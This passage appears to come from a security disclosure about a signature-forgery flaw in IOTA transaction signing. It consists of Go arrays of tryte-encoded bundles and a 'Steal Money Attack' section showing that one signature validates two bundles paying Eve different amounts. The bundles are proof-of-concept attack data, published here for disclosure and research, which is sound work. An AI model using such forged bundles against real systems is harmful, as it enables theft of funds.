	"T9ENXSCXESWBKWAEZYAXTH9F9MXIIQQFAOOBKWFPNIPNNLPGGQTEITPVPHD9NYROGXCXZFSDVGNNAVHXYDJWLDNHRCOPUVIQJKAUUOQGKXETJKAQYMEAVBCDMCLEWZBBBOQHHEUFTOTLGCYLGSYR9NGZJERVVBPLKTAKDKZIZYGTLLAURPPZ9RBDTNITEHJESGCCILZGLZGHELDGQUYGLAXSMHAXKXKVZMEPXJXEU9EEQE9NOESANDTPG9VXDGAMDCSQXIZ9TMYHJINFZJMFHNBYVKUFYUVOMVWIVDOR9GQKIDDXMVTTYFSQSBTBCURPHSTQEKIDZKAWOAIXIOSRJUAWF9FYGSECKATVXMTFMTZTHIWZGGHHRZH9TCWBJICIFXPUGRPVQVWLQBYWBSOLPFLPADJFEWKCEZUCKELTBQHAZPKK9JOZNZTYTUSGCXELQBMKOYPHWPAXQO9RJOFZBSUNNINQGPQWPQIF9DSFDABVHV99NBEJHXGOBGZJDYQNGDWSSSPBXRLCDWIEWRWUIBDGBP9VKDXUQPOHWHBDXZEE9XCHQKKAVEOPFT9OQCP9FWXMBZZKHA9WAZTQPTGDEDZSUQYBBQFMUXYK9XHGOT9PIF99MABTFNOKBQNLBZX9KLWIQWXJNNEME9OLEBIACIPEDNNRNOQOVCJV9LTVZBJ9BFQRTEYPNCHSFRUGINUTFMQAN9AYRXURAYYFEJSAD9MSFWFHZEARJVFWXKQBBNF9XDIUZNYTZCIQXWFHUNMVZHCLZDMDASETYGMVP9AAUJUPWV9OZYNBAZNNLK9XPZWWWEYMHSV9TIAWEQFFEFIGDKRITLQFNTUF9UTBQXQKFUJXOHUCDSWBYMPOOLJBHUSQFSNPYHPGDPQOSLWJWYQXZCLNIRGKVNXUTBKUIHSKHJIIC9GWYTUOFVTEN9GUCWBEMYLZYUPJGGD9FZ9SHEGELULYIJRX9PMDEYAVLBTFZARAUNCBNDKUKQGONPWIQRDWH9LNADANVLZ9CXCLCSDQQFGVKMUWJIRDYJBKDWPUSBQWBKBPIBGFFXTPCQCDCAAMOEUMXGZKVXUTXWAHBXFED9NDOGIDVEWRSFQMRYLQPSYIEGOPC9OUYBXNMPRLSUACDYUPUXKFBIFZIGLRUGRJVXASHIMRQMDWYDRSXWMUXWBAAFNEIJPZYFEWQQCDSYQVALWNMMQFXELHRHPJVOTYNHGHGHXGZEDKPBFCKXAUBTXHYYCHCZDYQFQDLEILCCOFOIRREXZQJMOKBBHSV9W9ROBCHMLQUFEJLZVS99IJQWXQKDI9JMXIRSM9GJCDHCFQXPYPYTCMFBF9DBTHTDSDWHIIWKUKGNTTJHHLOCWNKVKKJA9UMDAYFINZJXHUPLHZSFXYWCBUBXMGRXZYZDVZQWDNVTOPIJ9OCNYPUYOSYRQ9CJTBVLUFNNNHBLD9UWMQ9AZEXKRTAIBLEIMUSSFY9NWSTQTCGZCLPPHBUWXLQZZINXGKGMGBVUCGRKGHVHTBZQEUXXP9TZTVGVOBAWGHXZBEJXUM9SDF9AUDRDTVM9OLUUKBKRILDDXS9IACTQDCVGCOEELTYAVTQWZOSZXDRGSLIANMTAZMBNWGFWTADZIRWPORWMXNVMAZFWOXXTN9QHYZVRWLNUQFLXVAXCLVGUQEZOXX9GNGDGQYRHWHVFZBHGTCMZNDEIUUW9WCLCBXJRRWWAGYYL9MFRYMGEYFVZBGXLZWQVPLAORHRHKBZRK9RFPVYCFY9OGZTUIMRCFUKECNVAUDEVMPFALFLOCJAFPP9ZJQSWKPDEUKYLQEHRKBZFAZNT9KAHCBTMXRUVTIZQF9TCPXTVHWOFGFDSHWHMOQPJIMQRHZIRUCBCGKBOCLCFNFOIZDMOMVHTNIOPWWBVVXXEREZYQDQOLNCZTHIHXYJYXNLOJFRCESLW9GFPWVGIVFIRZXPWKWBJRLMDKANZNHXZERMRR9GYSPXRHGYFTGSA9PTIYIIESAVYBKSDBLENGJVJMBTBVLGYLOLUBEJAOJTZJBVEEX9RVCWYQL99TAJNQ9WJOGGGXQRWLQQUACRSBPTURELEFLFVSJEEGCFRKECKYGIKAUJI9XQDFVZXPPQCQGTJWBVIH9GNZWZZEMSMWLP99XPPKTAMEJTXUDFSJIYRGRSZJFBGEHPEREIVAKWEGLJNIUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQNZLBSOPY99999999999999999999IOTFORALL999999999999999999QONOPXD99A99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBEDGIMHMPIBKDRBMVHLGWVIKHXRYAMRHDMXMCKKECVTILEKQPLU9REKU9EPFBBUJFLKKSXZRHYBYE99999999999999999999999999999999999999999999999999999999999999999999999999999999999999LSOHCSYKWXYECPTHKLODD9SMCWWHFSYPP9SISSTYAHCSWTTHGIU9ZDQURAGHZSMOCD9UFXLONCPPEPROK",
	"AZZOAMZUHGXDUOIHRAUMIHKXGGHHEQQMIWC9YJEOBBSGHSPAEOMETB9KJYWY9JAAIBATGBLJKSGOJRESIBAMUXJZQPBYUPLIXRVJKEXWLZCTKLFAHDTIGCZLAKNPDDBPNTBLOZWUUORDJRHQRG9JUDXM9TFJPBTGZU9SLYDSVXUJFOVXATDNAVKMYMKISIBFZUGXURFMUXAMSRSSIPJJMNWFNIIYXDTTGRSJAG9GVNNISICGT9NNOBNL9KVUAH9XSFIRQCE9CZZKWYUYXBFP9ALYIBGYIIAZLJGWOTPXQYDWYNZVHBHDMMIQSSIQBQLMGSQZZCOVTZJRAPHNZEQEIOQRDXBUCTTSNITUUJBINBKN9WELKCICGRPZQVGWXPQDPBSIOTOCQEHPUKVQFEYFBZETIDDQPZU9BICHVWAKVWZLURDLMMHRNGFGHLTBGSWSMBFLSAUMKFRHIBEKMBHYXJGILSANILBADYTRFFA9YEKXLHPYF99OAATJLSDRPIBWKIEHAWEZRWGSZTIQVFWSDZFCNGYBKOOIQSX9MWLKXYV9OJALEXRCRACJGELZGMHABAARWWUZTXANVJWSIEVDYTDUODPWFSZRSTIGKQKFSKLRGOY9MVDLRJCEIBLTVQCKSAEWNJIIQHTXKERPYY9KYQW9MUHJLXEKAEH9WHJCBKMMCPCTDCSHGCBLFCFVHETFPASMMWLFTOAWRXQUTEEXQRWPQDPQLCQVADCOH9NHZFQVZBHFXTTXFOLTUUGGYDPFQNUULSHIGEBKQMDBOCSNQGRSWMGSUVOOLWGLYAWYENOGLYJJVMNHG9VLCPLAVEYIYU9JQAUTI9KCYBFGEMMLQRFQYNQHYGZINBNTDQVACCOCJIOYDDB9ZKUJHZFHCSTYICHRPWMYYRUODWLNGQSFOWLTEJ9HGWHDJEDAPAQPJCKZ9QEVVUNRRPVCZGZPDOFYZFYUZFGUZQJCNBHALHIABDCT9GWOAIVDS9KKXPEQSTV9TWCTOEUFJIWGG9BGPSWZ9GMWWTAIVOPXCAIHCCYPZVAWTRPYA9M9NMPMDZHHFJXORIHIRKVVDSE9SKOLGPUGCIVAYEYERGILSGLWVLSKCRJWLRLCNZZBZ9N9ECFIDCTOLDAVJF9LUQKCTKUXLM9VUMVRBPPRJWXPDNGTBW9VLMIQVNCVSHLFTD9CLTCYBXNYTXMJEAA9YRVBTMDVKFSNKIGRAEDNCXTHGNVCVRSJTZTFAWJLSXFFOKHGYIRFRBHJOBN9SBPXLDCBMBXVYMLMV9QILNSG9OQWZWUUBDQQVFUCMFGNJLCZELGVXTKVYSFEZZHJGZJLNPHYXHKBW9P9LVFUDRHFPVOI9LWCZPYXMSCDSWNHHNYYSLWTYMWVZJXTZERJIITODWAZSJP9LENIJNPNDND9JDWTWK9SNYIQITBMHBXZHIAFNES9FTPQWVZKLMDVJKHAGUR9MTDOYRZRVQBOT9CRBWOKZBUEFLDZLLCXWKTRONBLTJ9GRMQTOCTTSKWAYGBTNDFG9BWIQGTPOXBZPPEPSZD9REOGLAREBTQJGJDBXZBIIZOFFDNBRNQFZNFSDH9NTKTKTXOPRZZGYWPVEFQHIZSBGDLICHPAPSLXNCQMMMN9JOAPKGMJDFAHAALWZRHRZCDNUMMYHWFWWVRRLWGJ9M9HRZFKGNUDOCINHUOGBKDUFBGNMXIYYULCCQWGCETCNVTPKBUIMAJBOUCAUVFVKO9PTKB9XORQXHPCVGVHNBZCABJNGNDRZALIXWBHRAWLYOVPNEOGTCSXCFTQCFBIQOUCTRCKSHPJYGXVOGKZFUID9UTNTHHHPUZOUGBTRDIJDJYAFLSGZNQQ9MKDBXSTELCSEPOME9SXYPTOATRDCKTEWJXNYWEPRGUCSXMILODMO9LBZEPC9QLDYYTSSKCVNAHQBPJCMLOZVTRCFEGCU9ZHK9VKLJLVOJCTMDBEAVGCOCYMBFJJSADVSLBNYTPNWDY9CEDTKLTLI9DVYXJKKCF9NS9AUCNKNCBTJLWJQXKSCGRTMCRVKPQXJMLCPTLUBNM9JPKYQXPFLDFTZBCJUAWOBWDS9WJVWOYHHFHUPMUJBZQDUWDDODRCEAPHYTAJXERJHA9VNLWMOAOBPWVVBOSIXBWJWTNQXBMBPHYY9LODFTETJUSVNVUTLYIXXAA9VPGUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQN999999999999999999999999999OIWIKARHXINUDPCAKJPWE9KLQQWQONOPXD99B99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBRWNYGRUPLIIFDKKOS9ZLNRUHFXTKNEMHNBCJTZTIXYEMFGKDGLU9BDFXKMPPWIZCHXWYRXPGLDJZ99999999999999999999999999999999999999999999999999999999999999999999999999999999999999RRCMVPHUBRSRAS9DHXTJ9UEMJOWHLPCECP9FQQOFLOWYOMSMFAWELLTU9FZ9LVHALTB9H9SNXUTFYMTCO",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999FHCLCTGISPCIDWQYNQYKZZZRR9CXJPFNIPCITNCVVYINBXEYFEYKXGETCZMIQJBMBZBOMSDVFPAXR9OBNEZJELKB99999999999999999999IOTFORALL999999999999999999VRNOPXD99C99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLB999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999PRWBZGIJFWAPFKZBNHSNCRXOVCSUDEUCVNXSELYDGJWUFAEZCCAIQPFJMQOWSKM9YLGPLOVSFY9FMOCQR",
}

var BURN_BUNDLE2 []string = []string{
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999ROQDJLWUDUXBKHJ9PNUPEBYLSJTSAT9RCKFVTCJFDUKHZJUDSSTELTIRA9DHKPUZTGSHAZNJKOFFKAXXPWPOC99999999999999999999999IOTFORALL999999999999999999QONOPXD99999999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBUVFIJRFOGR9MUWPBJCGSUYIOL9KFXMYXGSJQ9AXQTCWESFGDVRBDREIUHURCIJUBKIBPACTNTQPJ99999999999999999999999999999999999999999999999999999999999999999999999999999999999999AKKSAQHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIF9JXMKVJEFVEIOWSSQJFVVRMBKE",
	"T9ENXSCXESWBKWAEZYAXTH9F9MXIIQQFAOOBKWFPNIPNNLPGGQTEITPVPHD9NYROGXCXZFSDVGNNAVHXYDJWLDNHRCOPUVIQJKAUUOQGKXETJKAQYMEAVBCDMCLEWZBBBOQHHEUFTOTLGCYLGSYR9NGZJERVVBPLKTAKDKZIZYGTLLAURPPZ9RBDTNITEHJESGCCILZGLZGHELDGQUYGLAXSMHAXKXKVZMEPXJXEU9EEQE9NOESANDTPG9VXDGAMDCSQXIZ9TMYHJINFZJMFHNBYVKUFYUVOMVWIVDOR9GQKIDDXMVTTYFSQSBTBCURPHSTQEKIDZKAWOAIXIOSRJUAWF9FYGSECKATVXMTFMTZTHIWZGGHHRZH9TCWBJICIFXPUGRPVQVWLQBYWBSOLPFLPADJFEWKCEZUCKELTBQHAZPKK9JOZNZTYTUSGCXELQBMKOYPHWPAXQO9RJOFZBSUNNINQGPQWPQIF9DSFDABVHV99NBEJHXGOBGZJDYQNGDWSSSPBXRLCDWIEWRWUIBDGBP9VKDXUQPOHWHBDXZEE9XCHQKKAVEOPFT9OQCP9FWXMBZZKHA9WAZTQPTGDEDZSUQYBBQFMUXYK9XHGOT9PIF99MABTFNOKBQNLBZX9KLWIQWXJNNEME9OLEBIACIPEDNNRNOQOVCJV9LTVZBJ9BFQRTEYPNCHSFRUGINUTFMQAN9AYRXURAYYFEJSAD9MSFWFHZEARJVFWXKQBBNF9XDIUZNYTZCIQXWFHUNMVZHCLZDMDASETYGMVP9AAUJUPWV9OZYNBAZNNLK9XPZWWWEYMHSV9TIAWEQFFEFIGDKRITLQFNTUF9UTBQXQKFUJXOHUCDSWBYMPOOLJBHUSQFSNPYHPGDPQOSLWJWYQXZCLNIRGKVNXUTBKUIHSKHJIIC9GWYTUOFVTEN9GUCWBEMYLZYUPJGGD9FZ9SHEGELULYIJRX9PMDEYAVLBTFZARAUNCBNDKUKQGONPWIQRDWH9LNADANVLZ9CXCLCSDQQFGVKMUWJIRDYJBKDWPUSBQWBKBPIBGFFXTPCQCDCAAMOEUMXGZKVXUTXWAHBXFED9NDOGIDVEWRSFQMRYLQPSYIEGOPC9OUYBXNMPRLSUACDYUPUXKFBIFZIGLRUGRJVXASHIMRQMDWYDRSXWMUXWBAAFNEIJPZYFEWQQCDSYQVALWNMMQFXELHRHPJVOTYNHGHGHXGZEDKPBFCKXAUBTXHYYCHCZDYQFQDLEILCCOFOIRREXZQJMOKBBHSV9W9ROBCHMLQUFEJLZVS99IJQWXQKDI9JMXIRSM9GJCDHCFQXPYPYTCMFBF9DBTHTDSDWHIIWKUKGNTTJHHLOCWNKVKKJA9UMDAYFINZJXHUPLHZSFXYWCBUBXMGRXZYZDVZQWDNVTOPIJ9OCNYPUYOSYRQ9CJTBVLUFNNNHBLD9UWMQ9AZEXKRTAIBLEIMUSSFY9NWSTQTCGZCLPPHBUWXLQZZINXGKGMGBVUCGRKGHVHTBZQEUXXP9TZTVGVOBAWGHXZBEJXUM9SDF9AUDRDTVM9OLUUKBKRILDDXS9IACTQDCVGCOEELTYAVTQWZOSZXDRGSLIANMTAZMBNWGFWTADZIRWPORWMXNVMAZFWOXXTN9QHYZVRWLNUQFLXVAXCLVGUQEZOXX9GNGDGQYRHWHVFZBHGTCMZNDEIUUW9WCLCBXJRRWWAGYYL9MFRYMGEYFVZBGXLZWQVPLAORHRHKBZRK9RFPVYCFY9OGZTUIMRCFUKECNVAUDEVMPFALFLOCJAFPP9ZJQSWKPDEUKYLQEHRKBZFAZNT9KAHCBTMXRUVTIZQF9TCPXTVHWOFGFDSHWHMOQPJIMQRHZIRUCBCGKBOCLCFNFOIZDMOMVHTNIOPWWBVVXXEREZYQDQOLNCZTHIHXYJYXNLOJFRCESLW9GFPWVGIVFIRZXPWKWBJRLMDKANZNHXZERMRR9GYSPXRHGYFTGSA9PTIYIIESAVYBKSDBLENGJVJMBTBVLGYLOLUBEJAOJTZJBVEEX9RVCWYQL99TAJNQ9WJOGGGXQRWLQQUACRSBPTURELEFLFVSJEEGCFRKECKYGIKAUJI9XQDFVZXPPQCQGTJWBVIH9GNZWZZEMSMWLP99XPPKTAMEJTXUDFSJIYRGRSZJFBGEHPEREIVAKWEGLJNIUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQNZLBSOPY99999999999999999999IOTFORALL999999999999999999QONOPXD99A99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBDQKUXWGQDQXSROL9XNNYMMESP9YCXDQAXRBG9DXGVSBHLNXGQKBVFFUCEUHMKCTJQPMLJZDLVRBO99999999999999999999999999999999999999999999999999999999999999999999999999999999999999NINQDSYKWXYECPTHKLODD9SMCWWHFSYPP9SISSTYAHCSWTTHGIU9ZDGWRAGHZSMOCD9UFXLONCPPEPROK",
	"AZZOAMZUHGXDUOIHRAUMIHKXGGHHEQQMIWC9YJEOBBSGHSPAEOMETB9KJYWY9JAAIBATGBLJKSGOJRESIBAMUXJZQPBYUPLIXRVJKEXWLZCTKLFAHDTIGCZLAKNPDDBPNTBLOZWUUORDJRHQRG9JUDXM9TFJPBTGZU9SLYDSVXUJFOVXATDNAVKMYMKISIBFZUGXURFMUXAMSRSSIPJJMNWFNIIYXDTTGRSJAG9GVNNISICGT9NNOBNL9KVUAH9XSFIRQCE9CZZKWYUYXBFP9ALYIBGYIIAZLJGWOTPXQYDWYNZVHBHDMMIQSSIQBQLMGSQZZCOVTZJRAPHNZEQEIOQRDXBUCTTSNITUUJBINBKN9WELKCICGRPZQVGWXPQDPBSIOTOCQEHPUKVQFEYFBZETIDDQPZU9BICHVWAKVWZLURDLMMHRNGFGHLTBGSWSMBFLSAUMKFRHIBEKMBHYXJGILSANILBADYTRFFA9YEKXLHPYF99OAATJLSDRPIBWKIEHAWEZRWGSZTIQVFWSDZFCNGYBKOOIQSX9MWLKXYV9OJALEXRCRACJGELZGMHABAARWWUZTXANVJWSIEVDYTDUODPWFSZRSTIGKQKFSKLRGOY9MVDLRJCEIBLTVQCKSAEWNJIIQHTXKERPYY9KYQW9MUHJLXEKAEH9WHJCBKMMCPCTDCSHGCBLFCFVHETFPASMMWLFTOAWRXQUTEEXQRWPQDPQLCQVADCOH9NHZFQVZBHFXTTXFOLTUUGGYDPFQNUULSHIGEBKQMDBOCSNQGRSWMGSUVOOLWGLYAWYENOGLYJJVMNHG9VLCPLAVEYIYU9JQAUTI9KCYBFGEMMLQRFQYNQHYGZINBNTDQVACCOCJIOYDDB9ZKUJHZFHCSTYICHRPWMYYRUODWLNGQSFOWLTEJ9HGWHDJEDAPAQPJCKZ9QEVVUNRRPVCZGZPDOFYZFYUZFGUZQJCNBHALHIABDCT9GWOAIVDS9KKXPEQSTV9TWCTOEUFJIWGG9BGPSWZ9GMWWTAIVOPXCAIHCCYPZVAWTRPYA9M9NMPMDZHHFJXORIHIRKVVDSE9SKOLGPUGCIVAYEYERGILSGLWVLSKCRJWLRLCNZZBZ9N9ECFIDCTOLDAVJF9LUQKCTKUXLM9VUMVRBPPRJWXPDNGTBW9VLMIQVNCVSHLFTD9CLTCYBXNYTXMJEAA9YRVBTMDVKFSNKIGRAEDNCXTHGNVCVRSJTZTFAWJLSXFFOKHGYIRFRBHJOBN9SBPXLDCBMBXVYMLMV9QILNSG9OQWZWUUBDQQVFUCMFGNJLCZELGVXTKVYSFEZZHJGZJLNPHYXHKBW9P9LVFUDRHFPVOI9LWCZPYXMSCDSWNHHNYYSLWTYMWVZJXTZERJIITODWAZSJP9LENIJNPNDND9JDWTWK9SNYIQITBMHBXZHIAFNES9FTPQWVZKLMDVJKHAGUR9MTDOYRZRVQBOT9CRBWOKZBUEFLDZLLCXWKTRONBLTJ9GRMQTOCTTSKWAYGBTNDFG9BWIQGTPOXBZPPEPSZD9REOGLAREBTQJGJDBXZBIIZOFFDNBRNQFZNFSDH9NTKTKTXOPRZZGYWPVEFQHIZSBGDLICHPAPSLXNCQMMMN9JOAPKGMJDFAHAALWZRHRZCDNUMMYHWFWWVRRLWGJ9M9HRZFKGNUDOCINHUOGBKDUFBGNMXIYYULCCQWGCETCNVTPKBUIMAJBOUCAUVFVKO9PTKB9XORQXHPCVGVHNBZCABJNGNDRZALIXWBHRAWLYOVPNEOGTCSXCFTQCFBIQOUCTRCKSHPJYGXVOGKZFUID9UTNTHHHPUZOUGBTRDIJDJYAFLSGZNQQ9MKDBXSTELCSEPOME9SXYPTOATRDCKTEWJXNYWEPRGUCSXMILODMO9LBZEPC9QLDYYTSSKCVNAHQBPJCMLOZVTRCFEGCU9ZHK9VKLJLVOJCTMDBEAVGCOCYMBFJJSADVSLBNYTPNWDY9CEDTKLTLI9DVYXJKKCF9NS9AUCNKNCBTJLWJQXKSCGRTMCRVKPQXJMLCPTLUBNM9JPKYQXPFLDFTZBCJUAWOBWDS9WJVWOYHHFHUPMUJBZQDUWDDODRCEAPHYTAJXERJHA9VNLWMOAOBPWVVBOSIXBWJWTNQXBMBPHYY9LODFTETJUSVNVUTLYIXXAA9VPGUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQN999999999999999999999999999OIWIKARHXINUDPCAKJPWE9KLQQWQONOPXD99B99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBAXNROPYOSAHUZEPPIWTYNZTQBVNRLLXZRNFSGUTEOGLGTUJSNSUAULMVOMQPUPVUGSZIOEJPWJQG99999999999999999999999999999999999999999999999999999999999999999999999999999999999999COFRVPHUBRSRAS9DHXTJ9UEMJOWHLPCECP9FQQOFLOWYOMSMFAWELLOV9FZ9LVHALTB9H9SNXUTFYMTCO",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999FHCLCTGISPCIDWQYNQYKZZZRS9CXJPFNIPCITNCVVYINBXEYFEYKXGETCZMIQJBMBZBOMSDVFPAXR9OBNEZJELKB99999999999999999999IOTFORALL999999999999999999VRNOPXD99C99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLB999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999JSNUYGIJFWAPFKZBNHSNCRXOVCSUDEUCVNXSELYDGJWUFAEZCCAIQPXLMQOWSKM9YLGPLOVSFY9FMOCQR",
}

Steal Money Attack

These two bundles demonstrate the signature forgery "steal money" attack described earlier in the report. A signature on STEAL_BUNDLE1 is also a valid signature for STEAL_BUNDLE2. We also provide the bundle structure below.

In STEAL_BUNDLE1:
- tx0  50000 spend to Alice
- tx1  -939211930 fund, Alice's sig
- tx2  0, Alice's sig
- tx3  100 to Eve 
- tx4  0
- tx5  939161830 to Alice
- tx6  0

In STEAL_BUNDLE2:
- tx0  50000 spend to Alice
- tx1  -939211930 fund, Alice's sig
- tx2  0, Alice's sig
- tx3  129140263 to Eve
- tx4  0
- tx5  810021667 to Alice
- tx6  0



var STEAL_BUNDLE1 []string = []string{
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999ROQDJLWUDUXBKHJ9PNUPEBYLSJTSAT9RCKFVTCJFDUKHZJUDSSTELTIRA9DHKPUZTGSHAZNJKOFFKAXXPWPOC99999999999999999999999IOTFORALL999999999999999999QONOPXD99999999999F99999999QLQGXIBGDZMQP9OYZELAPXFHECTSGTDLDAABBYCUWMZHSDTQOOVXZUPVPLOSPHEBIQ9VVHCN9GBYKXZVNGGJJRHED9WMQCZEOBLKEKVZCUO9XMEPLEZGSLRBATHHTCHRPKLHGLXUWCD9YQMZ9HUNJHXMTEOHB99999999999999999999999999999999999999999999999999999999999999999999999999999999999999CJHXQRHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIZZJXMKVJEFVEIOWSSQJFVVRMBKE",
